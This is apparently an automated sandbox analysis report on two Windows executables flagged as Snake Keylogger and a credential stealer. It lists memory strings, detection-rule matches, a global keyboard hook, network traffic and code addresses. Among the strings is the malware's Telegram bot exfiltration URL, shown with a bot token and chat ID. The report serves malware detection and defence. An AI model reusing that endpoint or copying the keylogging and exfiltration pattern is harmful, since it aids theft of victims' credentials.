            Source: tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002F38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002F38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7347885220:AAFmOXgoc0UBDpYJA8OUR6HtUv-Uevo_Ttc/sendDocument?chat_id=6939
            Source: customer request.exe, 00000008.00000002.4137608364.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D47000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D54000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D62000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002CE9000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D39000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D9E000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002DC3000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E2A000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E0F000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E38000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002D75000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E67000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: customer request.exe, 00000000.00000002.1722509797.0000000004D1D000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4133954704.000000000041B000.00000040.00000400.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000A.00000002.1763910283.0000000004B99000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000A.00000002.1763910283.0000000004C7B000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002D75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: customer request.exe, 00000008.00000002.4137608364.0000000002D47000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D54000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D62000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002CE9000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D39000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D9E000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002DC3000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E2A000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E0F000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E38000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E67000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
            Source: customer request.exe, tjvxuavKFXO.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
            Source: unknownNetwork traffic detected: HTTP traffic on port 62955 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62954
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62955
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62952
            Source: unknownNetwork traffic detected: HTTP traffic on port 62948 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 62952 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 62946 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62954 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62946
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62948
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:62946 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:62955 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Source: customer request.exe, HookManager.cs.Net Code: EnsureSubscribedToGlobalKeyboardEvents
            Source: tjvxuavKFXO.exe.0.dr, HookManager.cs.Net Code: EnsureSubscribedToGlobalKeyboardEvents

            System Summary

            barindex
            Source: 10.2.tjvxuavKFXO.exe.4b999b0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 10.2.tjvxuavKFXO.exe.4b999b0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 10.2.tjvxuavKFXO.exe.4b999b0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 10.2.tjvxuavKFXO.exe.4b999b0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 8.2.customer request.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 8.2.customer request.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 8.2.customer request.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 0.2.customer request.exe.4d3e188.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.customer request.exe.4d3e188.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.customer request.exe.4d3e188.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.customer request.exe.4d3e188.4.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.customer request.exe.4d1d568.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.customer request.exe.4d1d568.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 0.2.customer request.exe.4d1d568.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.customer request.exe.4d1d568.5.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 10.2.tjvxuavKFXO.exe.4b999b0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 10.2.tjvxuavKFXO.exe.4b999b0.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 10.2.tjvxuavKFXO.exe.4b999b0.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 10.2.tjvxuavKFXO.exe.4b999b0.1.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 0.2.customer request.exe.4d3e188.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.customer request.exe.4d3e188.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.customer request.exe.4d3e188.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.customer request.exe.4d3e188.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 0.2.customer request.exe.4d1d568.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.customer request.exe.4d1d568.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.customer request.exe.4d1d568.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.customer request.exe.4d1d568.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 00000008.00000002.4133954704.000000000040D000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000008.00000002.4133954704.000000000041B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 0000000A.00000002.1763910283.0000000004B99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0000000A.00000002.1763910283.0000000004B99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 00000000.00000002.1722509797.0000000004D1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000000.00000002.1722509797.0000000004D1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 0000000A.00000002.1763910283.0000000004C7B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0000000A.00000002.1763910283.0000000004C7B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: Process Memory Space: customer request.exe PID: 6848, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: customer request.exe PID: 6848, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: Process Memory Space: customer request.exe PID: 1908, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: customer request.exe PID: 1908, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: Process Memory Space: tjvxuavKFXO.exe PID: 7348, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: tjvxuavKFXO.exe PID: 7348, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: C:\Users\user\Desktop\customer request.exeCode function: 0_2_016DD6CC0_2_016DD6CC
            Source: C:\Users\user\Desktop\customer request.exeCode function: 0_2_07A3E54B0_2_07A3E54B
            Source: C:\Users\user\Desktop\customer request.exeCode function: 0_2_07A313E00_2_07A313E0
            Source: C:\Users\user\Desktop\customer request.exeCode function: 0_2_07A3A7AF0_2_07A3A7AF
            Source: C:\Users\user\Desktop\customer request.exeCode function: 0_2_07A3A7C00_2_07A3A7C0
            Source: C:\Users\user\Desktop\customer request.exeCode function: 0_2_07A307660_2_07A30766
            Source: C:\Users\user\Desktop\customer request.exeCode function: 0_2_07A316BB0_2_07A316BB
            Source: C:\Users\user\Desktop\customer request.exeCode function: 0_2_07A316C80_2_07A316C8
            Source: C:\Users\user\Desktop\customer request.exeCode function: 0_2_07A385C10_2_07A385C1
            Source: C:\Users\user\Desktop\customer request.exeCode function: 0_2_07A385D00_2_07A385D0
            Source: C:\Users\user\Desktop\customer request.exeCode function: 0_2_07A313D00_2_07A313D0
            Source: C:\Users\user\Desktop\customer request.exeCode function: 0_2_07A372100_2_07A37210
            Source: C:\Users\user\Desktop\customer request.exeCode function: 0_2_07A381610_2_07A38161
            Source: C:\Users\user\Desktop\customer request.exeCode function: 0_2_07A38E300_2_07A38E30
            Source: C:\Users\user\Desktop\customer request.exeCode function: 0_2_07A38E400_2_07A38E40
            Source: C:\Users\user\Desktop\customer request.exeCode function: 0_2_07A38A080_2_07A38A08
            Source: C:\Users\user\Desktop\customer request.exeCode function: 0_2_07A389F80_2_07A389F8
            Source: C:\Users\user\Desktop\customer request.exeCode function: 0_2_07A505F00_2_07A505F0
            Source: C:\Users\user\Desktop\customer request.exeCode function: 0_2_092AC9080_2_092AC908
            Source: C:\Users\user\Desktop\customer request.exeCode function: 0_2_092A15200_2_092A1520
            Source: C:\Users\user\Desktop\customer request.exeCode function: 0_2_092ADFE00_2_092ADFE0
            Source: C:\Users\user\Desktop\customer request.exeCode function: 0_2_092A1F400_2_092A1F40
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_012161088_2_01216108
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_0121C1908_2_0121C190
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_0121F0078_2_0121F007
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_0121B3288_2_0121B328
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_0121C4708_2_0121C470
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_0121C7528_2_0121C752
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_012198588_2_01219858
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_012168808_2_01216880
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_0121BBD28_2_0121BBD2
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_0121CA328_2_0121CA32
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_01214AD98_2_01214AD9
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_0121BEB28_2_0121BEB2
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_0121E5288_2_0121E528
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_0121E5178_2_0121E517
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_012135728_2_01213572
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_0121B4F28_2_0121B4F2
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056F84608_2_056F8460
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056F38708_2_056F3870
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056F7B708_2_056F7B70
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056F0D608_2_056F0D60
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056FED608_2_056FED60
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056FB9408_2_056FB940
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056F0D518_2_056F0D51
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056FED508_2_056FED50
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056FB9308_2_056FB930
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056FE9088_2_056FE908
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056F09008_2_056F0900
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056FC1E08_2_056FC1E0
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056FC1F08_2_056FC1F0
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056F11C08_2_056F11C0
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056FF1A98_2_056FF1A9
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056FF1B88_2_056FF1B8
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056F11B08_2_056F11B0
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056FBD888_2_056FBD88
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056FBD988_2_056FBD98
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056F7D908_2_056F7D90
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056F38608_2_056F3860
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056FE0498_2_056FE049
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056F00408_2_056F0040
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056FE0588_2_056FE058
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056F00068_2_056F0006
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056FDC008_2_056FDC00
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056FB4E88_2_056FB4E8
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056FE8F88_2_056FE8F8
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056F08F08_2_056F08F0
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056FB4D78_2_056FB4D7
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056F04A08_2_056F04A0
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056FE4A08_2_056FE4A0
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056FE4B08_2_056FE4B0
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056F04908_2_056F0490
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056FD3408_2_056FD340
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056FD3508_2_056FD350
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056F73E88_2_056F73E8
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056FDBF18_2_056FDBF1
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056FD7A88_2_056FD7A8
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056FD7988_2_056FD798
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056FFA688_2_056FFA68
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056FC6488_2_056FC648
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056FFA598_2_056FFA59
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056FC6388_2_056FC638
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056FF6008_2_056FF600
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056FF6108_2_056FF610
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056FCEEA8_2_056FCEEA
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056FCEF88_2_056FCEF8
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056FCAA08_2_056FCAA0
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_0695B6E88_2_0695B6E8
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_069586088_2_06958608
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_0695AA588_2_0695AA58
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_0695D6708_2_0695D670
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_0695C3888_2_0695C388
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_06958BED8_2_06958BED
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_0695B0A08_2_0695B0A0
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_0695A4088_2_0695A408
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_0695D0288_2_0695D028
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_069570508_2_06957050
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_069511A08_2_069511A0
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_0695C9D88_2_0695C9D8
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_0695BD388_2_0695BD38
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_0695F2928_2_0695F292
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_06955EB88_2_06955EB8
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_0695F2A08_2_0695F2A0
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_0695B6D98_2_0695B6D9
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_06955EC88_2_06955EC8
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_069556188_2_06955618
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_069586028_2_06958602
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_0695560A8_2_0695560A
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_0695AA488_2_0695AA48
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_06955A708_2_06955A70
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_06955A608_2_06955A60
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_0695D6628_2_0695D662
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_069533B88_2_069533B8
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_069533A88_2_069533A8
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_06956BD08_2_06956BD0
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_06956BC18_2_06956BC1
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_0695A3F88_2_0695A3F8
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_069563128_2_06956312
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_069537308_2_06953730
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_069563208_2_06956320
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_069567788_2_06956778
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_0695C3788_2_0695C378
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_0695676A8_2_0695676A
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_069574978_2_06957497
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_069504988_2_06950498
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_0695B08F8_2_0695B08F
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_069504888_2_06950488
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_069574A88_2_069574A8
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_069578F08_2_069578F0
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_069508F08_2_069508F0
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_069508E08_2_069508E0
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_069528188_2_06952818
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_0695D0188_2_0695D018
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_069528078_2_06952807
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_069500068_2_06950006
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_069544308_2_06954430
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_069500408_2_06950040
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_069570498_2_06957049
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_069511918_2_06951191
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_069551988_2_06955198
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_0695518A8_2_0695518A
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_069581B08_2_069581B0
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_069581A08_2_069581A0
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_0695C9C88_2_0695C9C8
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_069579008_2_06957900
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_06950D398_2_06950D39
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_0695BD288_2_0695BD28
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_06957D588_2_06957D58
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_06950D488_2_06950D48
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_06957D488_2_06957D48
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 10_2_0318D6CC10_2_0318D6CC
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 10_2_08EEC90810_2_08EEC908
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 10_2_08EEDFEB10_2_08EEDFEB
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 10_2_08EE152010_2_08EE1520
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 10_2_08EE1F4010_2_08EE1F40
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_02A953F013_2_02A953F0
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_02A9A1E813_2_02A9A1E8
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_02A9C1D213_2_02A9C1D2
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_02A9768013_2_02A97680
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_02A9C79013_2_02A9C790
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_02A9C4B213_2_02A9C4B2
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_02A94AD913_2_02A94AD9
